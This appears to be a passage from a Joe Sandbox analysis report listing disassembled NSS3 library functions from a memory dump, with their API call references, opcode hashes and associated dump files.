Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 4661428c5b577f444aa2514e0b1e46dd0f1db10b250ca9457ecab8e8992e27f8
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: C3014EA5B4020577FA2022767E09F9B268C4F5039DF140034FE0496F82FB95F11882B6

Function 6C7D0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B
TlsGetValue.KERNEL32(00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1044
free.MOZGLUE(00000000,?,00000800,6C76EF74,00000000), ref: 6C7D1064

Strings

security, xrefs: 6C7D1025

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 5f5537a84ff9ebff22d14404308d291039296ab0c3408a6ce4982bcf1290ae78
Instruction ID: 0b5bee2b760fce064967e97bbf062e440c7190f13aecb7cb99f04bcd14d13fa1
Opcode Fuzzy Hash: 5f5537a84ff9ebff22d14404308d291039296ab0c3408a6ce4982bcf1290ae78
Instruction Fuzzy Hash: 1A016670A402909BE7303F3D9E08B563A68BF0276CF020535E80897E52EB70F614EBD1

Function 6C801C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C801C74

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C801C92
free.MOZGLUE(?), ref: 6C801C99
DeleteCriticalSection.KERNEL32(?), ref: 6C801CCB
free.MOZGLUE(?), ref: 6C801CD2

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: e285c7796ca806965b294ba2670128eac480c04e618a5918eea6115177fa1765
Instruction ID: b42fcd1820d6ca3d2aeb9604b7fd2dd5b357435fd9cef60445649a0e98696bc2
Opcode Fuzzy Hash: e285c7796ca806965b294ba2670128eac480c04e618a5918eea6115177fa1765
Instruction Fuzzy Hash: F20192B1F052215FEE30AFA49E0DB4977B8AB0672DF110935E90AA2E41D729F504C7D2

Function 6C812E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C813046

Part of subcall function 6C7FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7FEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C7E7FFB), ref: 6C81312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C813154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C812E8B

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Part of subcall function 6C7FF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C7E9BFF,?,00000000,00000000), ref: 6C7FF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C7E7FFA), ref: 6C812EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C81317B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: e89ba590e0f3f11e99fca7fd4c13f4910c41265514fc891e4bdd107913027d8c
Instruction ID: ffc28e9e2f587862f9c591e0765fc7ad341e2c3786ab7188ead6bacb55664735
Opcode Fuzzy Hash: e89ba590e0f3f11e99fca7fd4c13f4910c41265514fc891e4bdd107913027d8c
Instruction Fuzzy Hash: E3A1EE71A002199FDB24CF54CC84BEAB7B5EF4A308F048599ED49A7B41E731AE85CF91

Function 6C7DED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C7DED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C7DEDCE

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

free.MOZGLUE(00000000,?,?,?,?,6C7DB04F), ref: 6C7DEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7DEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C7DEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7DEEFB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 73ea7a8b63911c3f7a6057d8dde446d501bd7e237ff88d1aeae446074985f648
Instruction ID: 9056444fcecb2b69c2cf471113fa65ba2cb87755b94924bd09a21a27aa432bed
Opcode Fuzzy Hash: 73ea7a8b63911c3f7a6057d8dde446d501bd7e237ff88d1aeae446074985f648
Instruction Fuzzy Hash: 89815CB5A0020A9FEB15CF55DA85AABB7F5AF88308F15443CE8159B751DB30F814CBA1

Function 6C7DCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7DDAE2,?), ref: 6C7DC6C2

PR_Now.NSS3 ref: 6C7DCD35

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

Part of subcall function 6C7C6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771C6F,00000000,00000004,?,?), ref: 6C7C6C3F

PR_GetCurrentThread.NSS3 ref: 6C7DCD54

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

Part of subcall function 6C7C7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C771CCC,00000000,00000000,?,?), ref: 6C7C729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C7DCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C7DCE2C

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7DCE40

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

Part of subcall function 6C7DCEE0: PORT_ArenaMark_Util.NSS3(?,6C7DCD93,?), ref: 6C7DCEEE
Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7DCD93,?), ref: 6C7DCEFC
Part of subcall function 6C7DCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7DCD93,?), ref: 6C7DCF0B
Part of subcall function 6C7DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7DCD93,?), ref: 6C7DCF1D

Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF47
Part of subcall function 6C7DCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF67
Part of subcall function 6C7DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C7DCD93,?,?,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF78

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 3a106d6eabb93ca560095c938d31b479e2d54677014063050d9e6cc8d3c861d5
Instruction ID: fa63196bc1c22ed2c91b3c77cd112e20aa7530ae00fd7f5aeaac37e2bcf09cc5
Opcode Fuzzy Hash: 3a106d6eabb93ca560095c938d31b479e2d54677014063050d9e6cc8d3c861d5
Instruction Fuzzy Hash: F651D4B6A002129FEB10EF69DE45BAA77F9EF48349F260534D84997740EB31F904CB91

Function 6C7EFFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6C7EFFE5

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_EnterMonitor.NSS3(?), ref: 6C7F0004
PR_EnterMonitor.NSS3(?), ref: 6C7F001B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 5e0c8823b482fd2de7feb3784757f9456b95f8b854a6630a3c6c78ee17bac730
Instruction ID: f8c5b454ee538448cc54d20c5e34b6c27bdd89028cbe6f01d9bdb5fe9cd32876
Opcode Fuzzy Hash: 5e0c8823b482fd2de7feb3784757f9456b95f8b854a6630a3c6c78ee17bac730
Instruction Fuzzy Hash: FD410575644680CBE7304B28DED57AF73A1EB41388F10093DD46BCAF91E779A94BC682

Function 6C7AEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C7AEF38

Part of subcall function 6C799520: PK11_IsLoggedIn.NSS3(00000000,?,6C7C379E,?,00000001,?), ref: 6C799542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C7AEF53

Part of subcall function 6C7B4C20: TlsGetValue.KERNEL32 ref: 6C7B4C4C
Part of subcall function 6C7B4C20: EnterCriticalSection.KERNEL32(?), ref: 6C7B4C60
Part of subcall function 6C7B4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CA1
Part of subcall function 6C7B4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CBE
Part of subcall function 6C7B4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CD2
Part of subcall function 6C7B4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D3A

PR_GetCurrentThread.NSS3 ref: 6C7AEF9E

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

free.MOZGLUE(00000000), ref: 6C7AEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7AF016
free.MOZGLUE(00000000), ref: 6C7AF022

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: f93a7f44fc8bca8d5e9ff4f3004b92a8dd31800c26dda5a6318abc1bca3bb6a6
Instruction ID: 9bdd7d257898780588dab47f6d8778b8eb44ce1930af9f0b0bca7065d0750c80
Opcode Fuzzy Hash: f93a7f44fc8bca8d5e9ff4f3004b92a8dd31800c26dda5a6318abc1bca3bb6a6
Instruction Fuzzy Hash: 8C4181B1E00209AFDF018FE9DD45AEF7BB9EB48358F004135F914A6351E771D9168BA1

Function 6C79CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C79CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C79D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C79D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79D025
PR_NewLock.NSS3 ref: 6C79D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C79D074

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: df00ef3378ebffe5f59bbc8477ba2269a234ba212747add337c522fa98f8d0bb
Instruction ID: d885752772d619aa4e9e7f2209542304c151ccee161ede9bdb4d8f0d6d60f2f4
Opcode Fuzzy Hash: df00ef3378ebffe5f59bbc8477ba2269a234ba212747add337c522fa98f8d0bb
Instruction Fuzzy Hash: 3C41AEB1A012118FDB10DF2DEA8579ABBA4AF18318F10417ADC1D8BB46D774D885CBE5

Function 6C7E3FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7E3FF2

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaMark_Util.NSS3(?), ref: 6C7E4001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C7E400F

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C7E4054

Part of subcall function 6C77BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C77BC24
Part of subcall function 6C77BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C77BC39
Part of subcall function 6C77BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C77BC58
Part of subcall function 6C77BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C77BCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E4070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C7E40CD

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 9e89c96bca486263f87864bc652a7dbbfa5dcfb39f736e46143ccf60ddc944d3
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: F5312873E0034597EB009FA49E45BBB3364AF9871CF054278ED099B742FB31E958C292

Function 6C782E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C772D1A), ref: 6C782E7E

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

PR_Now.NSS3 ref: 6C782EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C782EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C772D1A), ref: 6C782F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C772D1A), ref: 6C782F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C782F81

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: dbf33755e1961376bc859a043b8756a7964048b9a7f7e549ea18303b3a729a3b
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 6D31F3715031048BE710C665DE4CFAEB269EF8032AF64097AD629D7AD1EB31998AC621

Function 6C770E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C770A2C), ref: 6C770E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C770A2C), ref: 6C770E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C770A2C), ref: 6C770E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C770A2C), ref: 6C770E90
free.MOZGLUE(00000000), ref: 6C770EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C770A2C), ref: 6C770ED9

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 4ed24f95403d7d1f3338b0f6196521122ba794be8b197488ea45beffe448d5da
Instruction ID: a88ff40b3ba9b94c28d6beb844c16cad50cec65c02ce570d88ef1c2f9bb13ead
Opcode Fuzzy Hash: 4ed24f95403d7d1f3338b0f6196521122ba794be8b197488ea45beffe448d5da
Instruction Fuzzy Hash: F2212E72B0028C57EF3065769E49B6B72AEDBC1748F194035D81853B42EAE2D81482B1

Function 6C77AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C77AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C77AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77AEDD
